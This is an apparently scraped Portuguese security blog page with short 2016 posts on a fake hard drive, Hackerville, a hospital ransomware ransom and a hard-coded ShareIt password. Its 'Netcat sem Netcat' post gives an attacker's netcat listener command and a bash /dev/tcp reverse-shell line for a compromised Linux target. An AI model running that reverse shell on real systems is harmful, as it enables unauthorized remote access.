Se você comprou um disco rígido de 1 TB da China, é melhor você abrir para saber o que tem lá dentro. O usuário kingruudz do reddit.com descobriu que ele foi enganado por uma empresa chinesa que disse ter enviado um disco rígido de 1TB que na verdade tinha apenas 32GB de espaço. A foto abaixo mostra a gambiarra.
O post original pode ser visto em: https://www.reddit.com/r/funny/comments/47c2qe/when_you_buy_a_1tb_hard_disk_from_china_but_its/
https://www.infosec.com.br/wp-content/uploads/2016/02/GtCB9hK.jpg800600juliocesarhttps://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.pngjuliocesar2016-02-26 14:34:312017-03-13 21:11:44Usuário compra HD externo de 1TB da china que tem apenas 32GB de espaço
Caso você nunca tenho ouvido falar de um lugar na Romênia chamado de Hackerville, o vídeo abaixo vai lhe explicar porque esse lugar ficou conhecido com esse nome. O vídeo foi feito pela Symantec.
https://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.png00juliocesarhttps://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.pngjuliocesar2016-02-24 12:38:192017-03-13 21:31:53Ransomware Proof of Concept dando Bypass no antivírus do windows
Mais uma vez o vírus ransomware ganhou destaque nas manchetes. Dessa vez o alvo foi o hospital The Hollywood Presbyterian Medical Center localizado em Los Angeles, eles tiveram seus dados criptografados e agora não conseguem acessar dados importantes de seus pacientes. Para liberar a senha que será usada para descriptografar esses dados os hackers estão pedindo uma bagatela de 3 milhões de dólares como resgate. Apesar do estrago que esses ransomware vem causando, a prevenção é muito simples: NÃO CLIQUE NAQUILO QUE VOCÊ NÃO SABE A PROCEDÊNCIA !!!!
P.S: Grandes sites como CNBC e a afiliada da NBC em Los Angeles reportaram que o valor do resgate foi de 3.7 milhões de dólares, sites menores estão dizendo que o valor não passou de 17 mil dólares. O próprio hospital emitiu uma nota dizendo que o valor pago pelo resgate foi de 17 mil dólares. O valor real pago ninguém sabe, o hospital pode ter emitido essa nota com valor inferior até mesmo para não incentivar outros ataques.
https://www.infosec.com.br/wp-content/uploads/2016/02/bitcoin.jpg388690juliocesarhttps://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.pngjuliocesar2016-02-18 16:48:122017-03-13 21:27:133 milhões de dólares em bitcoins
Por acaso você já conseguiu acesso a uma máquina rodando linux e ai você tentou rodar o netcat para fazer um shell reverso, mas se deparou por exemplo com o fato de que a máquina alvo não tinha o netcat instalado ou de repente você tentou instala-lo mas por algum motivo ele não funcionou?
Bom como todos sabemos geralmente ambientes linux tem o netcat instalado por padrão, mas você pode acabar se deparando com alguma máquina que esteja rodando linux mas não tem o netcat instalado. Os motivos para tal podem ser os mais diversos possíveis. Bom independente de qualquer coisa não se preocupe, existe diversas maneiras de usarmos o netcat sem ter o netcat instalado na máquina alvo. Abaixo segue uma das maneiras com que podemos fazer isso.
Bom a primeira coisa que precisamos fazer é rodar o netcat na nossa máquina e coloca-lo em em listen mode ou modo de escuta, para isso utilizamos o seguinte comando:
nc -n -v -l -p porta-desejada
Agora na máquina alvo utilizamos o seguinte comando:
O camando acima vai fazer com que a máquina alvo se conecte na máquina do atacante. Vale lembrar que o comando acima pode não funcionar em todas as distribuições linux, caso isso ocorra se vire nos 30.
Não sabe quem é esse tal de netcat? Well google it.
https://www.infosec.com.br/wp-content/uploads/2016/02/sh_nc_wo_nc.png302727juliocesarhttps://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.pngjuliocesar2016-02-05 12:45:592017-03-13 21:28:55Netcat sem Netcat no linux
O que você espera de um gigante da tecnologia para proteger a segurança do seu serviço SHAREit? com algum tipo de proteção correto?
Mas e se essa proteção for uma senha, e mais ainda, e se a senha for nada mais nada menos que “12345678” que vem hard-coded no software?
https://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.png00juliocesarhttps://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.pngjuliocesar2016-01-27 13:50:542017-07-26 20:46:26Lenovo protege sua segurança com a senha "12345678" no ShareIt
Usuário compra HD externo de 1TB da china que tem apenas 32GB de espaço
Se você comprou um disco rígido de 1 TB da China, é melhor você abrir para saber o que tem lá dentro. O usuário kingruudz do reddit.com descobriu que ele foi enganado por uma empresa chinesa que disse ter enviado um disco rígido de 1TB que na verdade tinha apenas 32GB de espaço. A foto abaixo mostra a gambiarra.
O post original pode ser visto em: https://www.reddit.com/r/funny/comments/47c2qe/when_you_buy_a_1tb_hard_disk_from_china_but_its/
Você conhece Hackerville?
Caso você nunca tenho ouvido falar de um lugar na Romênia chamado de Hackerville, o vídeo abaixo vai lhe explicar porque esse lugar ficou conhecido com esse nome. O vídeo foi feito pela Symantec.
Ransomware Proof of Concept dando Bypass no antivírus do windows
3 milhões de dólares em bitcoins
Mais uma vez o vírus ransomware ganhou destaque nas manchetes. Dessa vez o alvo foi o hospital The Hollywood Presbyterian Medical Center localizado em Los Angeles, eles tiveram seus dados criptografados e agora não conseguem acessar dados importantes de seus pacientes. Para liberar a senha que será usada para descriptografar esses dados os hackers estão pedindo uma bagatela de 3 milhões de dólares como resgate. Apesar do estrago que esses ransomware vem causando, a prevenção é muito simples: NÃO CLIQUE NAQUILO QUE VOCÊ NÃO SABE A PROCEDÊNCIA !!!!
P.S: Grandes sites como CNBC e a afiliada da NBC em Los Angeles reportaram que o valor do resgate foi de 3.7 milhões de dólares, sites menores estão dizendo que o valor não passou de 17 mil dólares. O próprio hospital emitiu uma nota dizendo que o valor pago pelo resgate foi de 17 mil dólares. O valor real pago ninguém sabe, o hospital pode ter emitido essa nota com valor inferior até mesmo para não incentivar outros ataques.
Netcat sem Netcat no linux
Por acaso você já conseguiu acesso a uma máquina rodando linux e ai você tentou rodar o netcat para fazer um shell reverso, mas se deparou por exemplo com o fato de que a máquina alvo não tinha o netcat instalado ou de repente você tentou instala-lo mas por algum motivo ele não funcionou?
Bom como todos sabemos geralmente ambientes linux tem o netcat instalado por padrão, mas você pode acabar se deparando com alguma máquina que esteja rodando linux mas não tem o netcat instalado. Os motivos para tal podem ser os mais diversos possíveis. Bom independente de qualquer coisa não se preocupe, existe diversas maneiras de usarmos o netcat sem ter o netcat instalado na máquina alvo. Abaixo segue uma das maneiras com que podemos fazer isso.
Bom a primeira coisa que precisamos fazer é rodar o netcat na nossa máquina e coloca-lo em em listen mode ou modo de escuta, para isso utilizamos o seguinte comando:
nc -n -v -l -p porta-desejada
Agora na máquina alvo utilizamos o seguinte comando:
/bin/bash -i > /dev/tcp/ip-da-máquina-do-atacante/porta-na-qual-o-necat-está-ouvindo-na-máquina-do-atacante 0<&1
O camando acima vai fazer com que a máquina alvo se conecte na máquina do atacante. Vale lembrar que o comando acima pode não funcionar em todas as distribuições linux, caso isso ocorra se vire nos 30.
Não sabe quem é esse tal de netcat? Well google it.
Lenovo protege sua segurança com a senha “12345678” no ShareIt
O que você espera de um gigante da tecnologia para proteger a segurança do seu serviço SHAREit? com algum tipo de proteção correto?
Mas e se essa proteção for uma senha, e mais ainda, e se a senha for nada mais nada menos que “12345678” que vem hard-coded no software?
Leia mais